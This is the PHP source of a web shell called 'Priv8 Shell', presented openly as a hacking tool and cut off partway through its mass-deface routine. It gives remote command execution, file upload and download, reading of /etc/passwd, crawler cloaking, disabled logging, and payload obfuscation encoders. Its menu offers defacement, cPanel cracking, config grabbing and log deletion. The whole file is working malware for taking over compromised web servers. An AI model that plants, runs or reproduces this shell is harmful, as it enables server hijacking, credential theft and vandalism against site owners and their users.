Priv Shell

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12.  
13. $auth_pass = "424f7bccf8b5f2c121dfb0ace2ef62ba"; ////////pass liveyousayang
14. $color = "#00ff00";
15. $default_action = 'FilesMan';
16. $default_use_ajax = true;
17. $default_charset = 'UTF-8';
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21. header('HTTP/1.0 404 Not Found');
22. exit;
23. }
24. }
25.  
26. function login_shell() {
27. ?>
28. <html>
29. <head>
30. <title>Hacker Patah Hati</title>
31. <link href='https://cdn.icon-icons.com/icons2/1281/PNG/512/1497619406-sad_85126.png' rel='icon' type='image/x-icon'/>
32.  
33. <style type="text/css">
34. html {
35. margin: 20px auto;
36. background: #000000;
37. color: #2F4F4F;
38. text-align: center;
39. }
40. header {
41. color: #2F4F4F;
42. margin: 10px auto;
43. }
44. input[type=password] {
45. width: 250px;
46. height: 25px;
47. color: #2F4F4F;
48. background: #000000;
49. border: 1px dotted #2F4F4F;
50. padding: 5px;
51. margin-left: 20px;
52. text-align: center;
53. }
54. </style>
55. </head>
56. <body>
57. <center>
58. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
59.  
60. <style type="text/css">
61.  
62. </style>
63. <br>
64. <br><br> <p><font color="#191919" face="iceland" size="8" color="red"><b>Root@<font color="red">Hacker Patah Hati</font></b>
65. <br><img style="width:490px;" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTtar32v9DqopxZRXzOHKkx0OR_hRnbH6CSwK8BxuN-cDsuK9eYbQ" border="0"></p>
66.  
67. <form method="post">
68. <input type="password" name="pass">
69. </form>
70. <?php
71. exit;
72. }
73. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
74. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
75. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
76. else
77. login_shell();
78. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
79. @ob_clean();
80. $file = $_GET['file'];
81. header('Content-Description: File Transfer');
82. header('Content-Type: application/octet-stream');
83. header('Content-Disposition: attachment; filename="'.basename($file).'"');
84. header('Expires: 0');
85. header('Cache-Control: must-revalidate');
86. header('Pragma: public');
87. header('Content-Length: ' . filesize($file));
88. readfile($file);
89. exit;
90. }
91. ?>
92. <html>
93. <head>
94. <title>Hacker Patah Hati</title>
95. <style type='text/css'>
96. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
97. html {
98. background: #000000;
99. color: darkcyan;
100. font-family: 'Share Tech Mono';
101. font-size: 12px;
102. width: 100%;
103. }
104. li {
105. display: inline;
106. margin: 1px;
107. padding: 1px;
108. }
109.  
110. #menu a {
111. padding:2px 10px;
112. margin:0;
113. background:black;
114. text-decoration:none;
115. letter-spacing:2px;
116. padding: 2px 10px;
117. margin: 0;
118. background: black;
119. text-decoration: none;
120. letter-spacing: 2px;
121. border-radius: 2px;
122. border-bottom: 2px solid darkcyan;
123. border-top: 2px solid darkcyan;
124. border-right: 2px solid darkcyan;
125. border-left: 2px solid darkcyan;
126. }
127. #menu a:hover {
128. background:#180000;
129. border-bottom:0px solid #333333;
130. border-top:0px solid #333333;
131. }
132. table tr:first-child{
133. background: darkcyan;
134. text-align: center;
135. color: white;
136. }
137. table, th, td {
138. border-collapse:collapse;
139. font-family: Tahoma, Geneva, sans-serif;
140. background: transparent;
141. font-family: 'Share Tech Mono';
142. font-size: 13px;
143. }
144. .table_home, .th_home, .td_home {
145. border: 1px solid cyan;
146. }
147. th {
148. padding: 13px;
149. }
150. a {
151. color: darkcyan;
152. text-decoration: none;
153. }
154. a:hover {
155. color: red;
156. text-decoration: underline;
157. }
158. b {
159. color: gold;
160. }
161. input[type=text], input[type=password],input[type=submit] {
162. background: transparent;
163. color: #ffffff;
164. border: 1px solid #ffffff;
165. margin: 5px auto;
166. padding-left: 5px;
167. font-family: 'Share Tech Mono';
168. font-size: 13px;
169. }
170. input[type=submit] {
171. background: transparent;
172. color: #ffffff;
173. border: 1px solid #ffffff;
174. margin: 5px auto;
175. padding-left: 5px;
176. font-family: 'Share Tech Mono';
177. font-size: 13px;
178. cursor:pointer;
179. }
180. textarea {
181. border: 1px solid darkcyan;
182. width: 100%;
183. height: 400px;
184. padding-left: 5px;
185. margin: 10px auto;
186. resize: none;
187. background: transparent;
188. color: darkcyan;
189. font-family: 'Share Tech Mono';
190. font-size: 13px;
191. }
192. select {
193. width: 152px;
194. background: #000000;
195. color: cyan;
196. border: 1px solid #ffffff;
197. margin: 5px auto;
198. padding-left: 5px;
199. font-family: 'Share Tech Mono';
200. font-size: 13px;
201. }
202. option:hover {
203. background: cyan;
204. color: darkcyan;
205. }
206. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid darkcyan; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px red;-webkit-box-shadow: 0px 4px 2px darkcyan;-moz-box-shadow: 0px 4px 2px darkcyan;}
207. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: darkcyan;font-size:25px;text-shadow: 5px 5px 5px black;}
208. .infoweb {
209. border-right: 1px solid darkcyan;
210. }
211. </style>
212. </head>
213. <?php
214. function w($dir,$perm) {
215. if(!is_writable($dir)) {
216. return "<font color=red>".$perm."</font>";
217. } else {
218. return "<font color=lime>".$perm."</font>";
219. }
220. }
221. function r($dir,$perm) {
222. if(!is_readable($dir)) {
223. return "<font color=red>".$perm."</font>";
224. } else {
225. return "<font color=lime>".$perm."</font>";
226. }
227. }
228. function exe($cmd) {
229. if(function_exists('system')) {
230. @ob_start();
231. @system($cmd);
232. $buff = @ob_get_contents();
233. @ob_end_clean();
234. return $buff;
235. } elseif(function_exists('exec')) {
236. @exec($cmd,$results);
237. $buff = "";
238. foreach($results as $result) {
239. $buff .= $result;
240. } return $buff;
241. } elseif(function_exists('passthru')) {
242. @ob_start();
243. @passthru($cmd);
244. $buff = @ob_get_contents();
245. @ob_end_clean();
246. return $buff;
247. } elseif(function_exists('shell_exec')) {
248. $buff = @shell_exec($cmd);
249. return $buff;
250. }
251. }
252. function perms($file){
253. $perms = fileperms($file);
254. if (($perms & 0xC000) == 0xC000) {
255. // Socket
256. $info = 's';
257. } elseif (($perms & 0xA000) == 0xA000) {
258. // Symbolic Link
259. $info = 'l';
260. } elseif (($perms & 0x8000) == 0x8000) {
261. // Regular
262. $info = '-';
263. } elseif (($perms & 0x6000) == 0x6000) {
264. // Block special
265. $info = 'b';
266. } elseif (($perms & 0x4000) == 0x4000) {
267. // Directory
268. $info = 'd';
269. } elseif (($perms & 0x2000) == 0x2000) {
270. // Character special
271. $info = 'c';
272. } elseif (($perms & 0x1000) == 0x1000) {
273. // FIFO pipe
274. $info = 'p';
275. } else {
276. // Unknown
277. $info = 'u';
278. }
279. // Owner
280. $info .= (($perms & 0x0100) ? 'r' : '-');
281. $info .= (($perms & 0x0080) ? 'w' : '-');
282. $info .= (($perms & 0x0040) ?
283. (($perms & 0x0800) ? 's' : 'x' ) :
284. (($perms & 0x0800) ? 'S' : '-'));
285. // Group
286. $info .= (($perms & 0x0020) ? 'r' : '-');
287. $info .= (($perms & 0x0010) ? 'w' : '-');
288. $info .= (($perms & 0x0008) ?
289. (($perms & 0x0400) ? 's' : 'x' ) :
290. (($perms & 0x0400) ? 'S' : '-'));
291. // World
292. $info .= (($perms & 0x0004) ? 'r' : '-');
293. $info .= (($perms & 0x0002) ? 'w' : '-');
294. $info .= (($perms & 0x0001) ?
295. (($perms & 0x0200) ? 't' : 'x' ) :
296. (($perms & 0x0200) ? 'T' : '-'));
297. return $info;
298. }
299. function hdd($s) {
300. if($s >= 1073741824)
301. return sprintf('%1.2f',$s / 1073741824 ).' GB';
302. elseif($s >= 1048576)
303. return sprintf('%1.2f',$s / 1048576 ) .' MB';
304. elseif($s >= 1024)
305. return sprintf('%1.2f',$s / 1024 ) .' KB';
306. else
307. return $s .' B';
308. }
309. function ambilKata($param, $kata1, $kata2){
310. if(strpos($param, $kata1) === FALSE) return FALSE;
311. if(strpos($param, $kata2) === FALSE) return FALSE;
312. $start = strpos($param, $kata1) + strlen($kata1);
313. $end = strpos($param, $kata2, $start);
314. $return = substr($param, $start, $end - $start);
315. return $return;
316. }
317. function getsource($url) {
318. $curl = curl_init($url);
319. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
320. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
321. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
322. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
323. $content = curl_exec($curl);
324. curl_close($curl);
325. return $content;
326. }
327. function bing($dork) {
328. $npage = 1;
329. $npages = 30000;
330. $allLinks = array();
331. $lll = array();
332. while($npage <= $npages) {
333. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
334. if($x) {
335. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
336. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
337. $npage = $npage + 10;
338. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
339. } else break;
340. }
341. $URLs = array();
342. foreach($allLinks as $url){
343. $exp = explode("/", $url);
344. $URLs[] = $exp[2];
345. }
346. $array = array_filter($URLs);
347. $array = array_unique($array);
348. $sss = count(array_unique($array));
349. foreach($array as $domain) {
350. echo $domain."\n";
351. }
352. }
353. function reverse($url) {
354. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
355. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
356. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
357. curl_setopt($ch, CURLOPT_HEADER, 0);
358. curl_setopt($ch, CURLOPT_POST, 1);
359. $resp = curl_exec($ch);
360. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
361. $array = explode(",,", $resp);
362. unset($array[0]);
363. foreach($array as $lnk) {
364. $lnk = "http://$lnk";
365. $lnk = str_replace(",", "", $lnk);
366. echo $lnk."\n";
367. ob_flush();
368. flush();
369. }
370. curl_close($ch);
371. }
372. if(get_magic_quotes_gpc()) {
373. function gans_ss($array) {
374. return is_array($array) ? array_map('gans_ss', $array) : stripslashes($array);
375. }
376. $_POST = gans_ss($_POST);
377. $_COOKIE = gans_ss($_COOKIE);
378. }
379.  
380. if(isset($_GET['dir'])) {
381. $dir = $_GET['dir'];
382. chdir($dir);
383. } else {
384. $dir = getcwd();
385. }
386. $kernel = php_uname();
387. $ip = gethostbyname($_SERVER['HTTP_HOST']);
388. $dir = str_replace("\\","/",$dir);
389. $scdir = explode("/", $dir);
390. $freespace = hdd(disk_free_space("/"));
391. $total = hdd(disk_total_space("/"));
392. $used = $total - $freespace;
393. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
394. $ds = @ini_get("disable_functions");
395. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
396. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
397. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
398. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
399. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
400. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
401. if(!function_exists('posix_getegid')) {
402. $user = @get_current_user();
403. $uid = @getmyuid();
404. $gid = @getmygid();
405. $group = "?";
406. } else {
407. $uid = @posix_getpwuid(posix_geteuid());
408. $gid = @posix_getgrgid(posix_getegid());
409. $user = $uid['name'];
410. $uid = $uid['uid'];
411. $group = $gid['name'];
412. $gid = $gid['gid'];
413. }
414. $d0mains = @file("/etc/named.conf");
415. $users=@file('/etc/passwd');
416. if($d0mains)
417. {
418. $count;
419. foreach($d0mains as $d0main)
420. {
421. if(@ereg("zone",$d0main))
422. {
423. preg_match_all('#zone "(.*)"#', $d0main, $domains);
424. flush();
425. if(strlen(trim($domains[1][0])) > 2)
426. {
427. flush();
428. $count++;
429. }
430. }
431. }
432. }
433. echo "<center>";
434. echo "
435. <font color='blue' size'9'>Priv8 Shell <font color='red'>root@KID2ZON3";
436. echo "<hr color='red'>";
437. echo "<font size='2px'>";
438. echo "System: <font color=lime>".$kernel."</font><br>";
439. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
440. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
441. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
442. echo "Safe Mode: $sm<br>";
443. echo "Disable Functions: $show_ds<br>";
444. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
445. echo "Websites: <font color=lime>".$count."</font> Domains<br>";
446. echo "Current DIR: ";
447. foreach($scdir as $c_dir => $cdir) {
448. echo "<a href='?dir=";
449. for($i = 0; $i <= $c_dir; $i++) {
450. echo $scdir[$i];
451. if($i != $c_dir) {
452. echo "/";
453. }
454. }
455. echo "'>$cdir</a>/";
456. }
457. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
458. echo "<hr color='red'>";
459. echo "<div id='menu'>";
460. echo "<a href='?'>Home</a>";
461. echo "<a href='?dir=$dir&do=upload'><font color='red'>Upload</font></a>";
462. echo "<a href='?dir=$dir&do=cmd'>Command</a>";
463. echo "<a href='?dir=$dir&do=mass_deface'><font color='red'>Mass Deface</a>";
464. echo "<a href='?dir=$dir&do=mass_delete'>Mass Delete</a>";
465. echo "<a href='?dir=$dir&do=configgrab'><font color='red'>Config</a>";
466. echo "<a href='?dir=$dir&do=jumping'><font color='red'>Jumping</a>";
467. echo "<a href='?dir=$dir&do=symlink'><font color='red'>Symlink</a>";
468. echo "<a href='?dir=$dir&do=cpanel'><font color='red'>CPanel Crack</a>";
469. echo "<p>";
470. echo "<a href='?dir=$dir&do=smtp'>SMTP Grabber</a>";
471. echo "<a href='?dir=$dir&do=zoneh'>Zone-H</a>";
472. echo "<a href='?dir=$dir&do=cgi'><font color='red'>CGI Telnet</a>";
473. echo "[ <a href='?dir=$dir&do=network'>network</a> ]";
474. echo "[ <a href='?dir=$dir&do=adminer'><font color='red'>Adminer</a> ]";
475. echo "[ <a href='?dir=$dir&do=hashgen'>Hash Generator</a> ]";
476. echo "[ <a href='?dir=$dir&do=etcpasswd'><font color='red'>Bypass /etc/passwd</a> ]";
477. echo "<p>";
478. echo "[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]";
479. echo "[ <a href='?dir=$dir&do=delogs'>Delete Logs</a> ]";
480. echo "[ <a href='?dir=$dir&do=auto_edit_user'><font color='red'>Auto Edit User</a> ]";
481. echo "[ <a href='?dir=$dir&do=cfl'>Bypass Cloudflare</a> ]";
482. echo "[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]";
483. echo "[ <a href='?dir=$dir&do=auto_dwp'><font color='red'>WordPress Auto Deface</a> ]";
484. echo "<p>";
485. echo "[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]";
486. echo "[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]";
487. echo "[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]";
488. echo "<a href='?dir=$dir&do=endec'>End/Decode</a>";
489. echo "<a href='?dir=$dir&do=about'>About</a> ]";
490. echo "<a style='color: red;' href='?logout=true'><font color='blue'>Logout</a>";
491. echo "</ul>";
492. echo "</center>";
493. echo "<hr color='black'>";
494. if($_GET['logout'] == true) {
495. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
496. echo "<script>window.location='?';</script>";
497. } elseif($_GET['do'] == 'endec') {
498. @ini_set('output_buffering',0);
499. @ini_set('display_errors', 0);
500. $text = $_POST['code'];
501. ?>
502. <center>
503. <h2>Encode And Decode By KID2ZON3</h2>
504. <form method="post">
505. <br>
506. <textarea class='form-control con7' cols='60' rows='10' name="code"></textarea>
507. <br><br>
508. <select class='form-control con7' size="1" name="ope">
509. <center>
510. <option value="urlencode">url</option>
511. <option value="base64">base64</option>
512. <option value="ur">convert_uu</option>
513. <option value="json">json</option>
514. <option value="gzinflates">gzinflate - base64</option>
515. <option value="str2">str_rot13 - base64</option>
516. <option value="gzinflate">str_rot13 - gzinflate - base64</option>
517. <option value="gzinflater">gzinflate - str_rot13 - base64</option>
518. <option value="gzinflatex">gzinflate - str_rot13 - gzinflate - base64</option>
519. <option value="gzinflatew">str_rot13-convert_uu-url-gzinflate-str_rot13-base64-convert_uu-gzinflate-url-str_rot13-gzinflate-base64</option>
520. <option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
521. <option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
522. </center>
523. </select>
524. &nbsp;<br><br><input class='kntd' type='submit' name='submit' value='Encode'>
525. <input class='kntd' type='submit' name='submits' value='Decode'>
526. </form>
527. <br>
528. <?php
529. $submit = $_POST['submit'];
530. if (isset($submit)){
531. $op = $_POST["ope"];
532. switch ($op) {case 'base64': $codi=base64_encode($text);
533. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
534. break;case 'json' : $codi=json_encode(utf8_encode($text));
535. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
536. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
537. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
538. break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
539. break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
540. break;case 'str2' : $codi=base64_encode(str_rot13($text));
541. break;case 'urlencode' : $codi=rawurlencode($text);
542. break;case 'ur' : $codi=convert_uuencode($text);
543. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
544. break;default:break;}}
545.  
546. $submit = $_POST['submits'];
547. if (isset($submit)){
548. $op = $_POST["ope"];
549. switch ($op) {case 'base64': $codi=base64_decode($text);
550. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
551. break;case 'json' : $codi=utf8_decode(json_decode($text));
552. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
553. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
554. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
555. break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
556. break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
557. break;case 'str2' : $codi=str_rot13(base64_decode($text));
558. break;case 'urlencode' : $codi=rawurldecode($text);
559. break;case 'ur' : $codi=convert_uudecode($text);
560. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
561. break;default:break;}}
562. $html = htmlentities(stripslashes($codi));
563. echo "<form><textarea cols=60 rows=10 class='form-control con7' >".$html."</textarea></center></form><br/><br/>";
564. } elseif($_GET['do'] == 'about') {
565. ?>
566. <tr>
567. <td>
568. <center>
569. <h2 style='color'blue'>Priv8 Shell root@KID2ZON3</font></h2>
570. <p style='color: white;'>GreetZ:</p>
571. <font color="cyan">[</font>
572. <marquee behavior="alternate" scrollamount="10" style="width: 40%;">All Member Anon Cyber Team - IndoXploit - 99Syndicate-N45HT</marquee>
573. <font color="cyan">]</font>
574. <p>Hacker Patah Hati</p>
575. </center>
576. </td>
577. </tr>
578. <?php
579. } elseif($_GET['do'] == 'cfl') {
580. echo '<form method="POST">
581. <center>
582. <p align="center" dir="ltr"><h2>Bypass CloudFlare</h2></p>
583. <select class="inputz" name="krz">
584. <option>ftp</option>
585. <option>direct-connect</option>
586. <option>webmail</option>
587. <option>cpanel</option>
588. </select>
589. <input class="inputz" type="text" name="target" value="url">
590. <input class="inputzbut" type="submit" value="Bypass!"></center>';
591. $target = $_POST['target'];
592. # Bypass From FTP
593. if ($_POST['krz'] == "ftp") {
594. $ftp = gethostbyname("ftp." . "$target");
595. echo "<br><p align='center' dir='ltr'>
596. <font face='Tahoma' size='2' color='white'>CORRECT IP IS : </font>
597. <font face='Tahoma' size='2' color='cyan'>$ftp</font></p>";
598. }
599. # Bypass From Direct-Connect
600. if ($_POST['krz'] == "direct-connect") {
601. $direct = gethostbyname("direct-connect." . "$target");
602. echo "<br><p align='center' dir='ltr'>
603. <font face='Tahoma' size='2' color='white'>CORRECT IP IS : </font>
604. <font face='Tahoma' size='2' color='cyan'>$direct</font></p>";
605. }
606. # Bypass From Webmail
607. if ($_POST['krz'] == "webmail") {
608. $web = gethostbyname("webmail." . "$target");
609. echo "<br><p align='center' dir='ltr'>
610. <font face='Tahoma' size='2' color='white'>CORRECT IP IS : </font>
611. <font face='Tahoma' size='2' color='cyan'>$web</font></p>";
612. }
613. # Bypass From Cpanel
614. if ($_POST['krz'] == "cpanel") {
615. $cpanel = gethostbyname("cpanel." . "$target");
616. echo "<br><p align='center' dir='ltr'>
617. <font face='Tahoma' size='2' color='white'>CORRECT IP IS : </font>
618. <font face='Tahoma' size='2' color='cyan'>$cpanel</font></p>";
619. }
620. } elseif($_GET['do'] == 'hashgen') {
621. $submit = $_POST['enter'];
622. if (isset($submit)) {
623. $pass = $_POST['password']; // password
624. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
625. $hash = md5($pass); // md5 hash #1
626. $md4 = hash("md4", $pass);
627. $hash_md5 = md5($salt . $pass); // md5 hash with salt #2
628. $hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1 #3
629. $hash1 = sha1($pass); // sha1 hash #4
630. $sha256 = hash("sha256", $text);
631. $hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt #5
632. $hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5 #6
633. }
634. echo '<form action="" method="post">';
635. echo '<center><h2>Hash Generator</h2>';
636. echo '<table>';
637. echo 'Masukkan teks yang ingin di encrypt: ';
638. echo '<input class="inputz" type="text" name="password" size="40">';
639. echo '<input class="inputzbut" type="submit" name="enter" value="Hash!">';
640. echo '<br>';
641. echo 'Original Password: <input class=inputz type=text size=50 value='.$pass.'><br><br>';
642. echo 'MD5: <input class=inputz type=text size=50 value='.$hash.'><br><br>';
643. echo 'MD4: <input class=inputz type=text size=50 value='.$md4 .'><br><br>';
644. echo 'MD5 with Salt: <input class=inputz type=text size=50 value='.$hash_md5.'><br><br>';
645. echo 'MD5 with Salt & Sha1: <input class=inputz type=text size=50 value='.$hash_md5_double.'><br><br>';
646. echo 'Sha1: <input class=inputz type=text size=50 value='.$hash1 .'><br><br>';
647. echo 'Sha256: <input class=inputz type=text size=50 value='.$sha256.'><br><br>';
648. echo 'Sha1 with Salt: <input class=inputz type=text size=50 value='.$hash1_sha1.'><br><br>';
649. echo 'Sha1 with Salt & MD5: <input class=inputz type=text size=50 value='.$hash1_sha1_double.'></center></table>';
650. } elseif($_GET['do'] == 'etcpasswd') {
651. echo '<center>
652. <h2>Bypass etc/passw With: </h2>
653. <table style="width:50%">
654. <tr>
655. <td>
656. <form method="post"><input type="submit" value="System Function" name="syst"></form>
657. </td>
658. <td>
659. <form method="post"><input type="submit" value="Passthru Function" name="passth"></form>
660. </td>
661. <td>
662. <form method="post"><input type="submit" value="Exec Function" name="ex"></form>
663. </td>
664. <td>
665. <form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form>
666. </td>
667. <td>
668. <form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form>
669. </td>
670. </tr>
671. </table>
672. <h2>Bypass User With: </h2>
673. <table style="width:50%">
674. <tr>
675. <td>
676. <form method="post"><input type="submit" value="Awk Program" name="awkuser"></form>
677. </td>
678. <td>
679. <form method="post"><input type="submit" value="System Function" name="systuser"></form>
680. </td>
681. <td>
682. <form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form>
683. </td>
684. <td>
685. <form method="post"><input type="submit" value="Exec Function" name="exuser"></form>
686. </td>
687. <td>
688. <form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form>
689. </td>
690. </tr>
691. </table>';
692.  
693. if ($_POST['awkuser']) {
694. echo"<textarea class='inputzbut' cols='65' rows='15'>";
695. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
696. echo "</textarea><br>";
697. }
698. if ($_POST['systuser']) {
699. echo"<textarea class='inputzbut' cols='65' rows='15'>";
700. echo system("ls /var/mail");
701. echo "</textarea><br>";
702. }
703. if ($_POST['passthuser']) {
704. echo"<textarea class='inputzbut' cols='65' rows='15'>";
705. echo passthru("ls /var/mail");
706. echo "</textarea><br>";
707. }
708. if ($_POST['exuser']) {
709. echo"<textarea class='inputzbut' cols='65' rows='15'>";
710. echo exec("ls /var/mail");
711. echo "</textarea><br>";
712. }
713. if ($_POST['shexuser']) {
714. echo"<textarea class='inputzbut' cols='65' rows='15'>";
715. echo shell_exec("ls /var/mail");
716. echo "</textarea><br>";
717. }
718. if($_POST['syst'])
719. {
720. echo"<textarea class='inputz' cols='65' rows='15'>";
721. echo system("cat /etc/passwd");
722. echo"</textarea><br><br><b></b><br>";
723. }
724. if($_POST['passth'])
725. {
726. echo"<textarea class='inputz' cols='65' rows='15'>";
727. echo passthru("cat /etc/passwd");
728. echo"</textarea><br><br><b></b><br>";
729. }
730. if($_POST['ex'])
731. {
732. echo"<textarea class='inputz' cols='65' rows='15'>";
733. echo exec("cat /etc/passwd");
734. echo"</textarea><br><br><b></b><br>";
735. }
736. if($_POST['shex'])
737. {
738. echo"<textarea class='inputz' cols='65' rows='15'>";
739. echo shell_exec("cat /etc/passwd");
740. echo"</textarea><br><br><b></b><br>";
741. }
742. echo '<center>';
743. if($_POST['melex'])
744. {
745. echo"<textarea class='inputz' cols='65' rows='15'>";
746. for($uid=0;$uid<60000;$uid++){
747. $ara = posix_getpwuid($uid);
748. if (!empty($ara)) {
749. while (list ($key, $val) = each($ara)){
750. print "$val:";
751. }
752. print "\n";
753. }
754. }
755. echo"</textarea><br>";
756. }
757. } elseif($_GET['do'] == 'upload') {
758. echo "<center>";
759. if($_POST['upload']) {
760. if($_POST['tipe_upload'] == 'biasa') {
761. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
762. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
763. } else {
764. $act = "<font color=red>failed to upload file</font>";
765. }
766. } else {
767. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
768. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
769. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
770. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
771. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
772. } else {
773. $act = "<font color=red>failed to upload file</font>";
774. }
775. } else {
776. $act = "<font color=red>failed to upload file</font>";
777. }
778. }
779. }
780. echo "Upload File:
781. <form method='post' enctype='multipart/form-data'>
782. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
783. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
784. <input type='file' name='ix_file'>
785. <input type='submit' value='upload' name='upload'>
786. </form>";
787. echo $act;
788. echo "</center>";
789. } elseif($_GET['do'] == 'cmd') {
790. echo "<form method='post'>
791. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
792. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
793. </form>";
794. if($_POST['do_cmd']) {
795. echo "<pre>".exe($_POST['cmd'])."</pre>";
796. }
797. } elseif($_GET['do'] == 'mass_deface') {
798. function sabun_massal($dir,$namafile,$isi_script) {
799. if(is_writable($dir)) {
800. $dira = scandir($dir);
801. foreach($dira as $dirb) {
802. $dirc = "$dir/$dirb";
803. $lokasi = $dirc.'/'.$namafile;
804. if($dirb === '.') {
805. file_put_contents($lokasi, $isi_script);
